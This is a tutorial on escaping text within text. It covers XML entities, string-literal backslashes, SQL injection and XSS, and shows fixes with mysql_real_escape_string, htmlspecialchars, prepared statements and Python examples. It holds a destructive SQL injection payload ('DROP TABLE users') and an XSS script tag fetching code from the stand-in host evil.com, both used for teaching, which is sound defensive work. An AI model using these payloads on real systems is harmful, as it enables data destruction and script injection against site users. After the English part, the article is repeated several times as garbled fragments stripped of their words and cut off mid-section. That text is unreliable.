Escaping (or what you need to know to work with text within text)

SQL injections, cross-site request forgery, corrupted XML... Scary, scary things that we would all like to protect against, but I'd rather just know why all of this happens. This article explains the fundamental concept behind all of it: strings, and the handling of strings within strings.



Main problem



This is just text. Yes, just text, and that is the main problem. Practically everything in a computer system is represented by text (which, in turn, is represented by bytes). The only difference is that some texts are meant for the computer and others for people. But both are still text. To show what I mean, here is a small example:

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Suppose, there is the English text, which I don't wanna translate into Russian
      </contents>
    </article>


Believe it or not, this is text. Some people call it XML, but it is just text. It may not be suitable for showing to an English teacher, but it is still just text. You can print it on a poster and take it to a rally, you can write it in a letter to your mom... it is text.



However, we want certain parts of this text to have some meaning for our computer. We want the computer to be able to extract the author and the text itself, so that it can do something with them. For example, turn the above into this:

  Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens 


How does the computer know how to do this? Well, because we conveniently wrapped certain parts of the text in special words in funny brackets, such as <author>. Since we did this, we can write a program that searches for these specific parts, extracts the text, and uses it for whatever we have in mind.

In other words, we used certain rules in our text to denote some special meaning that someone, following the same rules, could use.

Okay, this is not so difficult to understand. But what if we want to use these funny brackets, which have a special meaning, in our text, but without that special meaning? Something like this:

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
      </contents>
    </article>


The characters "<" and ">" are nothing special. They can legally be used anywhere, in any text, as in the example above. But what about our idea of special words like <author>? How is the computer supposed to know that the "<" in "x < n" is just a character, while the "<" in "<author>" starts a special word? XML is strict about this: inside the text, "<" and ">" are reserved for the special words, and a "<" or ">" that is just a character has to be written differently.

Here is how it is done in XML:

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
      </contents>
    </article>

A program that reads this XML knows that "&lt;" stands for "<" and "&gt;" for ">", and turns them back into those characters when it extracts the text.

This trick, writing a character that has a special meaning in a way that strips it of that meaning, is called escaping.

escape |iˈskāp| [ no obj. ] [...] [ with obj. ] [...] IT: [...]

Escaping is needed whenever a text has to contain characters that mean something special to whoever reads it, but which should be taken literally. For every character, the program reading the text asks itself: "is this part of the data, or is this an instruction for me?" Escaping is how the author of the text answers that question.

Now the ampersand (&) has become a special character itself: it is what announces "&lt;". So how do you write a plain "&" that is not the start of an escape sequence? By escaping the escape character: in XML a literal "&" is written as "&amp;", so the text "&<" becomes "&amp;&lt;".

XML is only one example. Take string literals in a programming language:

    var name = "Homo Sapiens";
    var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

The quotation marks tell the parser where the string starts and where it ends. This works fine for a text like this:

    var name = "Homo Sapiens";
    var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

Works! Great! But what if the text itself contains quotation marks?

    var name = "Homo Sapiens";
    var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... and the parser is lost: for it, the string ends right before Lorem, and everything after that is a syntax error. The quotation mark has a special meaning here, so it needs escaping. In most programming languages the escape character is the backslash:

    var name = "Homo Sapiens";
    var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

The "\" tells the parser that the quotation mark after it is part of the text, not the end of the string. And because "\" now has a special meaning too, a literal backslash has to be escaped as well: "\\". Sound familiar?

One text inside another inside another. An HTML page is text; a PHP file that produces it is text that contains HTML; a PHP string literal inside that file is yet another text inside a text. Each layer has its own special characters and its own escaping rules, and a piece of text that passes through several layers has to be escaped for each of them in turn, so that every parser along the way reads exactly what it should.



The best-known example of what happens when this is forgotten is SQL injection. SQL is a language for talking to databases, and a query in it looks like this:

    SELECT phone_number FROM users WHERE name = 'Alex'

This, too, is just text that the database parses. In a PHP program the SQL query is text inside another text, namely a PHP string:

    $query = "SELECT phone_number FROM users WHERE name = 'Alex'";
    $result = mysql_query($query);

So far so good: the query is fixed, the PHP string contains nothing that confuses the PHP parser, and the database receives exactly the text we wrote.

In real life, though, the name usually comes from the user rather than from the programmer. So we do this:

    $name = $_POST['name'];
    $query = "SELECT phone_number FROM users WHERE name = '$name'";
    $result = mysql_query($query);

Look closely: user text goes into SQL text, which goes into PHP text! Whatever the user typed ends up, character for character, inside the query!

The user can type anything at all into $_POST['name'], including characters that have a special meaning in SQL. Nobody escapes them, so the database reads them as SQL.

What does that look like in practice? A few inputs and the queries they produce:

    Input: Alex
    Query: SELECT phone_number FROM users WHERE name = 'Alex'

    Input: Mc'Donalds
    Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

    Input: Joe'; DROP TABLE users; --
    Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

See the problem? In the second case the name contains a "'", which for SQL means "end of string"; the query is now syntactically broken and the database returns an error. Annoying, but harmless. The third case is not harmless at all...

... because here the user's text is valid SQL. The database sees three things: a query for Joe, a command to delete the users table (the ' closed the string and the ; ended the statement), and a comment (--) that swallows the leftover quote so that nothing is left to complain about.

This is SQL injection, and it is neither a bug in the database nor a bug in PHP. It is the same mistake every time, whatever the languages involved: text written under one set of rules was pasted into text that follows another set of rules, without being escaped for it.



Another example: XSS, cross-site scripting. The same problem, this time with HTML.

Say you run a forum. Users write posts, which you store and then show to other users with a PHP template like this one:

    <div class="post">
      <p class="meta">
        Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
      </p>
      <p class="body">
        <?php echo $post['body']; ?>
      </p>
    </div>

For an ordinary post the browser receives this:

    <div class="post">
      <p class="meta">
        Posted by Plato on January 2, 15:31
      </p>
      <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
      </p>
    </div>

A post that happens to contain a few angle brackets still displays more or less correctly, because browsers are forgiving about a stray "<" or ">":

    <div class="post">
      <p class="meta">
        Posted by Pascal on November 23, 04:12
      </p>
      <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
      </p>
    </div>

... but what happens when a user submits this as the body of a post?

    <div class="post">
      <p class="meta">
        Posted by JackTR on July 18, 12:56
      </p>
      <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
      </p>
    </div>

What does the browser do? What it does with any script tag: it fetches the JavaScript from evil.com and runs it, in the browser of every visitor who views the page. The user's text has become code, because nobody escaped it for HTML.

In both cases the cause is identical: text from one layer was placed into another layer without being escaped by the rules of that layer. So what is the fix?

Escaping, of course! Before putting user text into SQL, escape it for SQL. Before putting it into HTML, escape it for HTML. Is it really that simple? Yes, it is!

For SQL in PHP, this was the job of mysql_real_escape_string:

    $name = $_POST['name'];
    $name = mysql_real_escape_string($name);
    $query = "SELECT phone_number FROM users WHERE name = '$name'";
    $result = mysql_query($query);

It escapes the characters that are special inside a MySQL string literal. The same three inputs now produce:

    Input: Alex
    Query: SELECT phone_number FROM users WHERE name = 'Alex'

    Input: Mc'Donalds
    Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

    Input: Joe'; DROP TABLE users; --
    Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string put a backslash in front of every quote, so the database reads the quote as part of the name rather than as the end of the string, and the user's text stays data.

And for HTML there is htmlspecialchars:

    <div class="post">
      <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
      </p>
      <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
      </p>
    </div>

htmlspecialchars replaces <, >, & and quotation marks with their HTML entities. The malicious post now reaches the browser like this:

    <div class="post">
      <p class="meta">
        Posted by JackTR on July 18, 12:56
      </p>
      <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
      </p>
    </div>

The browser displays the script tag as text instead of executing it: after escaping, the HTML parser no longer sees a tag, only characters. The text stays text.

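An added example, not code from the original article (whose snippets are PHP and JavaScript), that puts the escaping schemes discussed above side by side in Python: the XML/HTML character references (including the "&amp;&lt;" case from the XML section), the backslash-escaped string literal from the Plato example, and the forum template with every user-controlled value escaped. The function names are mine; the post bodies and the rendered markup are the article's own examples.

```python
import re

# --- Scheme 1: XML/HTML character references (&lt; &gt; &amp; &quot;) ---
_ENTITY_FOR = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;"}
_CHAR_FOR = {entity: ch for ch, entity in _ENTITY_FOR.items()}


def escape_markup(text):
    """Escape text for placement inside XML/HTML text or a quoted attribute."""
    # '&' must go first: it is the escape character, so escaping it after
    # the others would turn a freshly produced "&lt;" into "&amp;lt;".
    out = text.replace("&", "&amp;")
    for ch in '<>"':
        out = out.replace(ch, _ENTITY_FOR[ch])
    return out


def unescape_markup(text):
    """Reverse escape_markup(); one regex pass decodes each reference once."""
    # A chain of replace() calls would decode "&amp;lt;" twice and produce
    # "<"; the single pass correctly yields the literal text "&lt;".
    return re.sub(r"&(?:amp|lt|gt|quot);", lambda m: _CHAR_FOR[m.group(0)], text)


# --- Scheme 2: double-quoted string literals with backslash escapes ---
def quote_string_literal(text):
    """Wrap text in double quotes, escaping the quote and the backslash."""
    # Backslash first, for the same reason '&' went first above.
    body = text.replace("\\", "\\\\").replace('"', '\\"')
    return '"' + body + '"'


def unquote_string_literal(literal):
    """Reverse quote_string_literal(); rejects anything not shaped like one."""
    if len(literal) < 2 or literal[0] != '"' or literal[-1] != '"':
        raise ValueError("not a double-quoted literal")
    body = literal[1:-1]
    # Every backslash must be followed by a quote or a backslash, and every
    # quote must be preceded by a backslash; anything else is malformed.
    if not re.fullmatch(r'(?:[^"\\]|\\["\\])*', body):
        raise ValueError("malformed string literal")
    return re.sub(r'\\(["\\])', lambda m: m.group(1), body)


# --- Scheme 3: the article's forum template with user values escaped ---
def render_post(username, posted, body):
    """Render one post; username and body are user data, posted is server data."""
    # Same markup as the article's PHP template. The date string is produced
    # by the server (PHP's date()), so it is trusted; the other two are not.
    return ('<div class="post"> <p class="meta"> Posted by %s on %s </p> '
            '<p class="body"> %s </p> </div>'
            % (escape_markup(username), posted, escape_markup(body)))


# Constructed sample inputs, taken from the article's examples.
PASCAL_BODY = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
JACKTR_BODY = ('<script src="http://evil.com/dangerous.js" type="text/javascript" '
               'charset="utf-8"></script>')

if __name__ == "__main__":
    print(render_post("Pascal", "November 23, 04:12", PASCAL_BODY))
    print(render_post("JackTR", "July 18, 12:56", JACKTR_BODY))
    print(quote_string_literal('Plato is said to once have said "Lorem ipsum dolor sit amet".'))
```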


So the rule is: whenever you put text into another text, escape it according to the rules of the text it is going into. Text going into SQL is escaped for SQL. Text going into HTML is escaped for HTML. Text going into a string literal is escaped for that language's string literals (and so on, for every language and every layer). Every time.

Three related things that are often confused with escaping, but are something else:

Validation

Validation checks that input has the form you expect: a number where a number belongs, an email address where one belongs, and so on. "DROP TABLE users" is not a valid age; "42" is. Validation is useful, but it is not a substitute for escaping: a value can be perfectly valid for your application and still contain characters that are special in HTML or SQL, so even validated data has to be escaped when it goes into another text.

Sanitization

Sanitization "cleans" input by removing or altering what you don't want in it, for example by stripping HTML tags out of a forum post. Unlike escaping, it changes the data. It has its uses, but it does not replace escaping either: whatever data is left still has to be escaped for wherever it ends up.

Prepared SQL statements

For SQL there is a better approach than escaping: the query text and the data are sent to the database separately, so the data is never parsed as SQL at all. In PHP with PDO:

    $stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
    $stmt->execute(array($_POST['name']));

Nothing needs escaping here, because the user's text never becomes part of the query text. Where they are available, prepared statements are the preferred way to get user data into SQL.

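An added example, not from the original article (whose code targets PHP and MySQL), that runs the three inputs from the SQL injection table through a throwaway SQLite database in Python: first with the query built by string interpolation as in the article's first PHP version, then with the quote-doubling escape that SQLite's own string literals require, then with a parameterized query as in the PDO snippet above. The `users` table, its two rows and the phone numbers are constructed for the example; the function names are mine.

```python
import sqlite3

# Constructed sample data: the three inputs from the article's table.
SAMPLE_NAMES = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def make_db():
    """Throwaway in-memory database with the article's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0100"), ("Mc'Donalds", "555-0199")])
    return conn


def build_query_naively(name):
    """String interpolation, exactly like the article's first PHP version."""
    return "SELECT phone_number FROM users WHERE name = '%s'" % name


def escape_for_sqlite_literal(name):
    """Escape a value for a single-quoted SQLite string literal."""
    # SQLite's rule is to double the quote. The backslash that
    # mysql_real_escape_string uses is NOT an escape character in SQLite,
    # so escaping always has to follow the rules of the parser that will
    # actually read the text.
    return name.replace("'", "''")


def lookup(conn, sql, params=()):
    """Run one query; report ('ok', phone) or ('error', exception class name)."""
    try:
        row = conn.execute(sql, params).fetchone()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # Older Pythons raise sqlite3.Warning when the text contains more
        # than one statement, newer ones sqlite3.ProgrammingError; a broken
        # literal gives sqlite3.OperationalError. All mean "parse failed".
        return ("error", type(exc).__name__)
    return ("ok", row[0] if row else None)


def lookup_naively(conn, name):
    return lookup(conn, build_query_naively(name))


def lookup_with_manual_escape(conn, name):
    return lookup(conn, build_query_naively(escape_for_sqlite_literal(name)))


def lookup_with_parameters(conn, name):
    # Prepared statement: the SQL text is fixed and the value travels
    # separately, so the database never parses the name as SQL.
    return lookup(conn, "SELECT phone_number FROM users WHERE name = ?", (name,))


def users_still_exist(conn):
    """True if the users table survived with both rows intact."""
    return conn.execute("SELECT count(*) FROM users").fetchone()[0] == 2


def demo():
    """Run every input through every strategy; return {strategy: results}."""
    conn = make_db()
    return {
        "naive": [lookup_naively(conn, n) for n in SAMPLE_NAMES],
        "escaped": [lookup_with_manual_escape(conn, n) for n in SAMPLE_NAMES],
        "parameterized": [lookup_with_parameters(conn, n) for n in SAMPLE_NAMES],
        "table_intact": users_still_exist(conn),
    }


if __name__ == "__main__":
    for strategy, outcome in demo().items():
        print(strategy, outcome)
```

Note that the driver refuses to run the naive query for the third input rather than executing the second statement; the point is that the quote in the second input already breaks the query, and that neither escaping nor parameters let the database read the name as anything but a name.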




In summary: everything is text (or bytes), and text is constantly put inside other text. Each time that happens, the inner text must be escaped according to the rules of the outer one, or the parser of the outer text will read part of the data as instructions. Forgetting this is the root of SQL injection and XSS (and of broken XML and broken string literals). The fix is always the same: know which text you are writing into, and escape for it.
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

